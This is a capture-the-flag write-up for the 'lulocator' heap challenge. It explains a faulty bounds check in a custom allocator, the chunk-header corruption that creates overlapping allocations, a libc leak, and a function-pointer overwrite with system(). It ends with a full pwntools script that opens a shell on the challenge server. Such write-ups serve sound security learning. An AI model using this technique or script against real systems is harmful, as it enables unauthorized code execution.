lulocator

Binary Exploitation 50 pts

Challenge

"Who needs that buggy malloc? Made my own completely safe lulocator."

We are given a stripped 64-bit ELF binary that implements a custom heap allocator backed by mmap, along with the challenge libc. The binary is built with no PIE, no RELRO, and no stack canary; NX is enabled.

Binary Analysis

The program provides a menu with 7 operations:

  1. new - Allocates an object with a custom allocator, stores pointer in a slots array (max 16 slots)
  2. write - Reads data from stdin into an object's data buffer
  3. delete - Frees an object and NULLs its slot
  4. info - Prints the object's address, output stream pointer (stdout), and length
  5. set_runner - Stores a slot's object pointer into a global runner variable
  6. run - Calls runner->func_ptr(runner + 0x28) (function pointer stored at offset 0x10 of the object)
  7. quit - Exits

Object Layout (at address returned by allocator)

Offset  Size  Field
+0x00   8     field0 (unused, initialized to 0)
+0x08   8     field1 (unused, initialized to 0)
+0x10   8     func_ptr (initialized to a print function at 0x401608)
+0x18   8     output stream (FILE* stdout)
+0x20   8     length (user-requested size)
+0x28   N     user data buffer
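The layout above can be written as a `struct` format string, which is handy when decoding a raw dump of an object. This is a minimal sketch: the names `OBJ_HEADER` and `parse_object` are illustrative and do not come from the binary, and the sample bytes (including the stdout pointer) are made up.

```python
import struct

# Five little-endian 8-byte fields: field0, field1, func_ptr, out (FILE*), length.
OBJ_HEADER = struct.Struct("<5Q")

def parse_object(raw: bytes) -> dict:
    """Split a raw object dump into its header fields and user data."""
    field0, field1, func_ptr, out, length = OBJ_HEADER.unpack_from(raw, 0)
    data = raw[OBJ_HEADER.size:OBJ_HEADER.size + length]
    return {"field0": field0, "field1": field1, "func_ptr": func_ptr,
            "out": out, "length": length, "data": data}

# Made-up example: a fresh object of length 0x10 with a placeholder stdout pointer.
sample = OBJ_HEADER.pack(0, 0, 0x401608, 0x7ffff7fa0780, 0x10) + b"\x00" * 0x10
obj = parse_object(sample)
```

The header packs to exactly 0x28 bytes, which is why the user data (and the argument passed by run) starts at obj + 0x28.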

Custom Allocator

  • Arena: 0x40000 bytes allocated via mmap(PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON)
  • Bump allocation for new chunks, doubly-linked circular free list for freed chunks
  • Chunk header: 8 bytes before the data area, stores aligned_size | in_use_bit
  • Aligned size = align_up(request_size + 8, 16) with minimum 0x28
  • Free list has integrity checks (corrupted free list detection, double-free detection)
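The size rule can be checked with a few lines of Python. This is a sketch under one assumption that the writeup's numbers imply but do not state outright: `new` asks the allocator for 0x28 + user_size bytes (object header plus data). The function names are illustrative.

```python
CHUNK_HEADER = 8    # size word stored before the data area
OBJ_HEADER = 0x28   # object fields preceding the user data
MIN_CHUNK = 0x28    # minimum chunk size quoted above

def align_up(value: int, alignment: int) -> int:
    """Round value up to the next multiple of alignment (a power of two)."""
    return (value + alignment - 1) & ~(alignment - 1)

def chunk_size(request: int) -> int:
    """Chunk size the allocator would use for a raw request of `request` bytes."""
    return max(align_up(request + CHUNK_HEADER, 16), MIN_CHUNK)

def chunk_size_for_object(user_size: int) -> int:
    # Assumption: `new` requests OBJ_HEADER + user_size bytes.
    return chunk_size(OBJ_HEADER + user_size)
```

With these definitions, a size-0x10 object occupies a 0x40-byte chunk and a size-0x20 object a 0x50-byte chunk, matching the sizes used in the exploit.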

Vulnerability: Heap Buffer Overflow

The write command has a faulty bounds check: it accepts up to obj->length + 0x17 bytes (23 more than requested) into the data buffer at obj + 0x28. The allocator reserves only obj->length bytes plus alignment padding (0 to 15 bytes) for that buffer, so a maximum-length write always runs past the end of the chunk.

// Pseudocode of the bounds check in write
if (user_len >= obj->length + 0x18) {  // only lengths above length + 0x17 are rejected
    puts("too long");
    return;
}

When the user-requested size is a multiple of 16, the chunk has no padding (the 0x28-byte object header plus the 8-byte chunk header already total 0x30), so all 23 extra bytes land in the adjacent chunk. This overflow covers:

  • 8 bytes of the next chunk's size header
  • 15 bytes of the next chunk's object fields (offsets 0x00 through 0x0E)
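To see how the reach of the overflow depends on the requested size, the arithmetic can be sketched as below. It assumes the chunk layout described earlier (8-byte chunk header, 0x28-byte object header, 16-byte alignment); `overflow_bytes` is a hypothetical helper, not something from the binary.

```python
def overflow_bytes(user_size: int) -> int:
    """Bytes that a maximum-length write places past the end of the chunk."""
    chunk = max((0x28 + user_size + 8 + 15) & ~15, 0x28)  # aligned chunk size
    capacity = chunk - 8 - 0x28       # room for user data, padding included
    max_write = user_size + 0x17      # largest length the check accepts
    return max(max_write - capacity, 0)

# Reach for a few sizes: 0x10 and 0x20 have no padding, 0x11 has the most.
reach = {n: overflow_bytes(n) for n in (0x10, 0x11, 0x18, 0x20)}
```

Under these assumptions the reach is 23 minus the padding, so it ranges from 8 bytes (just the next size header) to 23 bytes (size header plus 15 bytes of the next object).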

Exploitation Strategy

The key insight is that by corrupting an adjacent chunk's size header, we can create overlapping allocations when the chunk is freed and reallocated.

Step-by-Step

  1. Allocate three adjacent chunks A (slot 0), B (slot 1), C (slot 2), each with size 0x10
  2. Leak libc via info(0) - the out field at obj+0x18 contains a pointer to stdout (a libc address: _IO_2_1_stdout_). Compute libc_base and system() address.
  3. Set runner to C via set_runner(2) - the global runner variable now holds C's address
  4. Write "/bin/sh\0" to C - this goes to C+0x28, which run() will later pass as the argument to the function pointer
  5. Overflow from A into B's chunk header - write 16 bytes of padding + p64(0x101) to change B's apparent chunk size from 0x40 to 0x100 (with in_use bit set)
  6. Free B - the allocator now believes B is a 0x100-byte free chunk, much larger than its actual 0x40 bytes
  7. Allocate D (size 0x20) - the allocator finds B's "large" free chunk and allocates from it. The allocation takes the first 0x50 bytes, and the allocator splits the remainder (0xB0 bytes) into a new free chunk starting at C+0x08. This remainder overlaps with C's object fields.
  8. Write through D to overflow into C's memory. D's user data starts at offset 0x28 from D. C's function pointer (C+0x10) is exactly 40 bytes from D's user data start. We write: 32 bytes of D's data + 8 bytes padding + 8 bytes of system() address. This overwrites C+0x10 (the func_ptr) with system.
  9. Call run() - this executes runner->func_ptr(runner + 0x28) which is now system("/bin/sh"), giving us a shell.
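The chunk arithmetic behind steps 5 to 7 can be reproduced offline. The sketch below uses offsets relative to the start of A's chunk header and assumes, as the steps describe, that the allocator carves D from the front of the free chunk and places the remainder header immediately after it. Variable names are illustrative.

```python
ALIGN = 16
OBJ_HEADER = 0x28
CHUNK_HEADER = 8

def chunk_size(user_size: int) -> int:
    """Aligned chunk size for an object with `user_size` bytes of data."""
    return (OBJ_HEADER + user_size + CHUNK_HEADER + ALIGN - 1) & ~(ALIGN - 1)

# Offsets relative to the start of A's chunk header.
a_hdr = 0
b_hdr = a_hdr + chunk_size(0x10)        # 0x40
c_hdr = b_hdr + chunk_size(0x10)        # 0x80
c_obj = c_hdr + CHUNK_HEADER            # 0x88

fake_b_size = 0x101 & ~1                # size B claims after step 5 (in_use bit cleared)
d_size = chunk_size(0x20)               # 0x50
remainder_hdr = b_hdr + d_size          # 0x90, i.e. C + 0x08
remainder_size = fake_b_size - d_size   # 0xb0
```

The remainder header lands 8 bytes into C's object, inside an unused field, which is why the overlap goes unnoticed until C's func_ptr is overwritten.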

Memory Layout Diagram

Before corruption:
[A header][A object (0x38 bytes)][B header][B object (0x38 bytes)][C header][C object]
 base+0   base+8                  base+0x40 base+0x48              base+0x80 base+0x88

After step 5 (overflow from A):
[A header][A data... AAAA...][0x101     ][B object               ][C header][C object]
                              ^corrupted B header (was 0x41)

After step 7 (alloc D from "big" B):
[A chunk  ][D header][D object (0x48 bytes)   ][remainder hdr][remainder...]
                                                ^base+0x90 = C+0x08
                                                          ^C+0x10 = func_ptr (in remainder)

After step 8 (write through D):
D's write data:  [DDDDD...32 bytes...][00000000][system_addr]
Lands at:        D+0x28               C+0x08    C+0x10 (func_ptr!)
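As a cross-check of the last diagram, the following sketch maps each 8-byte word of the step 8 payload to the arena offset it lands on. The offsets are relative to the arena base as in the first diagram; `SYSTEM` is a placeholder value, since the real address comes from the libc leak.

```python
import struct

D_OBJ = 0x48             # D reuses B's old object address
D_DATA = D_OBJ + 0x28    # start of D's user data (0x70)
C_OBJ = 0x88             # C's object address
SYSTEM = 0xdeadbeefcafe  # placeholder for the leaked system() address

payload = b"D" * 0x20 + struct.pack("<QQ", 0, SYSTEM)

# Map every 8-byte word of the payload to the offset it is written to.
landing = {D_DATA + i: payload[i:i + 8] for i in range(0, len(payload), 8)}
func_ptr_word = landing[C_OBJ + 0x10]
```

The payload is 0x30 bytes long, which stays below the 0x20 + 0x18 limit enforced by the bounds check, and its last word falls exactly on C's func_ptr.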

Exploit Code

from pwn import *

p = remote('chall.ehax.in', 40137)
libc = ELF('./libc.so.6', checksec=False)

# Helper functions for menu interaction
def new(sz):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'size: ', str(sz).encode())
    return p.recvline()
def write_data(idx, data):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'idx: ', str(idx).encode())
    p.sendlineafter(b'len: ', str(len(data)).encode())
    p.sendafter(b'data: ', data)
    return p.recvline()
def delete(idx):
    p.sendlineafter(b'> ', b'3')
    p.sendlineafter(b'idx: ', str(idx).encode())
    return p.recvline()
def info(idx):
    p.sendlineafter(b'> ', b'4')
    p.sendlineafter(b'idx: ', str(idx).encode())
    return p.recvline()
def set_runner(idx):
    p.sendlineafter(b'> ', b'5')
    p.sendlineafter(b'idx: ', str(idx).encode())
    return p.recvline()

new(0x10); new(0x10); new(0x10)                             # A=slot0, B=slot1, C=slot2
stdout_addr = int(info(0).split(b'out=')[1].split(b' ')[0], 16)
libc_base = stdout_addr - libc.symbols['_IO_2_1_stdout_']
system_addr = libc_base + libc.symbols['system']

set_runner(2)                                                # runner -> C
write_data(2, b'/bin/sh\x00')                                # C+0x28 = "/bin/sh"
write_data(0, b'A'*0x10 + p64(0x101))                       # corrupt B header: size=0x100
delete(1)                                                     # free "big" B
new(0x20)                                                     # D=slot1, overlaps C
write_data(1, b'D'*0x20 + p64(0) + p64(system_addr))        # overwrite C+0x10 = system
p.sendlineafter(b'> ', b'6')                                 # run() -> system("/bin/sh")
p.interactive()
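When adapting the exploit, it can help to sanity-check the leak before using it. The sketch below separates the parsing from the base computation and rejects a base that is not page-aligned, a common sign of a wrong libc or a misparsed line. The sample `info` line and the symbol offset are hypothetical; only the `out=` marker followed by a space is taken from the exploit's own parsing.

```python
def parse_out_field(line: bytes) -> int:
    """Extract the hex value after 'out=' from an info line."""
    # Assumes 'out=<hex>' is followed by a space, as the exploit's split() implies.
    return int(line.split(b"out=")[1].split(b" ")[0], 16)

def libc_base_from_leak(leak: int, symbol_offset: int) -> int:
    """Subtract the symbol's offset and insist on a page-aligned result."""
    base = leak - symbol_offset
    if base & 0xfff:
        raise ValueError(f"libc base {base:#x} is not page-aligned")
    return base

# Hypothetical line and offset, for illustration only.
sample_line = b"addr=0x7f0000001008 out=0x7f12345c7780 len=16\n"
hypothetical_stdout_offset = 0x1c7780
base = libc_base_from_leak(parse_out_field(sample_line), hypothetical_stdout_offset)
```

In the real exploit, the offset would come from `libc.symbols['_IO_2_1_stdout_']` rather than a hard-coded constant.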